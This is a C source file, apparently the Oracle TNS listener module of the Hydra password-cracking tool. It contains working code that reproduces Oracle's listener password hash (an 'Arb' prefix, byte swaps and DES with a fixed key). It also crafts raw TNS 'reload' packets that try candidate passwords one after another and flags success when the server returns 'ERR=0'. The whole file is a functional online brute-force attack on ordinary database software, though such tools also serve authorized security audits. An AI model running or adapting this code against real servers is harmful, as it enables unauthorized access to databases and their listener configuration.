/* david: PASSWORDS_LISTENER in listener.ora can be in clear or in plain mode, this module support the 2 modes, use -m PLAIN or -m CLEAR on the cmd line. Default is plain (oracle 10 uses it). Thanks to Marcell for the plain mode analysis available at http://marcellmajor.com/frame_listenerhash.html */ #include "hydra-mod.h" #ifndef LIBOPENSSL #include void dummy_oracle_listener() { printf("\n"); } #else #include #include #define HASHSIZE 17 extern char *HYDRA_EXIT; char *buf; unsigned char *hash; int sid_mechanism = AUTH_PLAIN; int initial_permutation(unsigned char **result, char *p_str, int *sz) { int k = 0; int i = strlen(p_str); char *buff; //expand the string with zero so that length is a multiple of 4 while ((i % 4) != 0) { i = i + 1; } *sz = 2 * i; if ((buff = malloc(i)) == NULL) { hydra_report(stderr, "[ERROR] Can't allocate memory\n"); return 1; } memset(buff, 0, i); strncpy(buff, p_str, strlen(p_str)); //swap the order of every byte pair for (k = 0; k < i; k += 2) { char bck = buff[k + 1]; buff[k + 1] = buff[k]; buff[k] = bck; } //convert to unicode if ((*result = malloc(2 * i)) == NULL) { hydra_report(stderr, "[ERROR] Can't allocate memory\n"); free(buff); return 1; } memset(*result, 0, 2 * i); for (k = 0; k < i; k++) { (*result)[2 * k] = buff[k]; } free(buff); return 0; } int ora_hash(unsigned char **orahash, unsigned char *buf, int len) { int i; if ((*orahash = malloc(HASHSIZE)) == NULL) { hydra_report(stderr, "[ERROR] Can't allocate memory\n"); return 1; } for (i = 0; i < 8; i++) { sprintf(((char *) *orahash) + i * 2, "%02X", buf[len - 8 + i]); } return 0; } int convert_byteorder(unsigned char **result, int size) { int i = 0; char *buff; if ((buff = malloc(size)) == NULL) { hydra_report(stderr, "[ERROR] Can't allocate memory\n"); return 1; } memcpy(buff, *result, size); while (i < size) { buff[i + 0] = (*result)[i + 3]; buff[i + 1] = (*result)[i + 2]; buff[i + 2] = (*result)[i + 1]; buff[i + 3] = (*result)[i + 0]; i += 4; } memcpy(*result, buff, size); free(buff); return 0; } int ora_descrypt(unsigned char **rs, unsigned char *result, int siz) { int i = 0; char lastkey[8]; des_key_schedule ks1; unsigned char key1[8] = { 0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF }; unsigned char ivec1[] = { 0, 0, 0, 0, 0, 0, 0, 0 }; unsigned char *desresult; memset(ivec1, 0, sizeof(ivec1)); if ((desresult = malloc(siz)) == NULL) { hydra_report(stderr, "[ERROR] Can't allocate memory\n"); return 1; } des_key_sched((C_Block *) key1, ks1); des_ncbc_encrypt(result, desresult, siz, ks1, &ivec1, DES_ENCRYPT); for (i = 0; i < 8; i++) { lastkey[i] = desresult[siz - 8 + i]; } des_key_sched((C_Block *) lastkey, ks1); memset(desresult, 0, siz); memset(ivec1, 0, sizeof(ivec1)); des_ncbc_encrypt(result, desresult, siz, ks1, &ivec1, DES_ENCRYPT); if ((*rs = malloc(siz)) == NULL) { hydra_report(stderr, "[ERROR] Can't allocate memory\n"); free(desresult); return 1; } memcpy(*rs, desresult, siz); return 0; } int ora_hash_password(char *pass) { // secret hash function comes here, and written to char *hash int siz = 0; unsigned char *desresult; unsigned char *result; char buff[strlen(pass) + 5]; memset(buff, 0, sizeof(buff)); //concatenate Arb string and convert the resulting string to uppercase snprintf(buff, sizeof(buff), "Arb%s", pass); strupper(buff); if (initial_permutation(&result, buff, &siz)) { hydra_report(stderr, "[ERROR] ora_hash_password: in initial_permutation\n"); return 1; } if (convert_byteorder(&result, siz)) { hydra_report(stderr, "[ERROR] ora_hash_password: in convert_byteorder\n"); return 1; } if (ora_descrypt(&desresult, result, siz)) { hydra_report(stderr, "[ERROR] ora_hash_password: in DES crypt\n"); return 1; } free(result); if (ora_hash(&result, desresult, siz)) { hydra_report(stderr, "[ERROR] ora_hash_password: in extracting Oracle hash\n"); return 1; } memcpy(hash, result, HASHSIZE); free(desresult); free(result); return 0; } int start_oracle_listener(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { unsigned char tns_packet_begin[22] = { "\x00\x00\x01\x00\x00\x00\x01\x36\x01\x2c\x00\x00\x08\x00\x7f\xff\x86\x0e\x00\x00\x01\x00" }; unsigned char tns_packet_end[32] = { "\x00\x3a\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x09\x94\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00" }; char *empty = ""; char *pass; char connect_string[200]; char buffer2[260]; int siz = 0; memset(connect_string, 0, sizeof(connect_string)); memset(buffer2, 0, sizeof(buffer2)); if (strlen(pass = hydra_get_next_password()) == 0) pass = empty; if (sid_mechanism == AUTH_PLAIN) { if ((hash = malloc(HASHSIZE)) == NULL) { hydra_report(stderr, "[ERROR] Can't allocate memory\n"); return 1; } memset(hash, 0, HASHSIZE); if (ora_hash_password(pass)) { hydra_report(stderr, "[ERROR] generating Oracle hash\n"); free(hash); return 1; } pass = (char *) hash; } snprintf(connect_string, sizeof(connect_string), "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICE=)(VERSION=169869568)))", pass); if (hash != NULL) free(hash); if (verbose) hydra_report(stderr, "[VERBOSE] using connectiong string: %s\n", connect_string); siz = 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string); if (siz > 255) { buffer2[0] = 1; buffer2[1] = siz - 256; } else { buffer2[1] = siz; } memcpy(buffer2 + 2, (char *) tns_packet_begin, sizeof(tns_packet_begin)); siz = strlen(connect_string); if (siz > 255) { buffer2[2 + sizeof(tns_packet_begin)] = 1; buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz - 256; } else { buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz; } memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2, (char *) tns_packet_end, sizeof(tns_packet_end)); memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end), connect_string, strlen(connect_string)); if (hydra_send(s, buffer2, 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string), 0) < 0) { return 1; } if ((buf = hydra_receive_line(s)) == NULL) return 1; if (verbose || debug) hydra_report(stderr, "[VERBOSE] Server answer: %s\n", buf); if (strstr(buf, "ERR=0") != NULL) { hydra_report_found_host(port, ip, "oracle-listener", fp); hydra_completed_pair_found(); } else hydra_completed_pair(); free(buf); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return 3; return 1; } void service_oracle_listener(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { int run = 1, next_run = 1, sock = -1; int myport = PORT_ORACLE, mysslport = PORT_ORACLE_SSL; hydra_register_socket(sp); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return; if ((miscptr != NULL) && (strlen(miscptr) > 0)) { strupper(miscptr); if (strncmp(miscptr, "CLEAR", 5) == 0) sid_mechanism = AUTH_CLEAR; } if (verbose) { switch (sid_mechanism) { case AUTH_CLEAR: hydra_report(stderr, "[VERBOSE] using SID CLEAR mechanism\n"); break; case AUTH_PLAIN: hydra_report(stderr, "[VERBOSE] using SID PLAIN mechanism\n"); break; } } while (1) { switch (run) { case 1: /* connect and service init function */ if (sock >= 0) sock = hydra_disconnect(sock); // usleep(300000); if ((options & OPTION_SSL) == 0) { if (port != 0) myport = port; sock = hydra_connect_tcp(ip, myport); port = myport; } else { if (port != 0) mysslport = port; sock = hydra_connect_ssl(ip, mysslport); port = mysslport; } if (sock < 0) { if (verbose || debug) hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); hydra_child_exit(1); } /* run the cracking function */ next_run = start_oracle_listener(sock, ip, port, options, miscptr, fp); break; case 3: /* clean exit */ if (sock >= 0) sock = hydra_disconnect(sock); hydra_child_exit(0); return; case 4: if (sock >= 0) sock = hydra_disconnect(sock); hydra_child_exit(2); return; default: hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); hydra_child_exit(0); } run = next_run; } } int service_oracle_listener_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { // called before the childrens are forked off, so this is the function // which should be filled if initial connections and service setup has to be // performed once only. // // fill if needed. // // return codes: // 0 all OK // -1 error, hydra will exit, so print a good error message here return 0; } #endif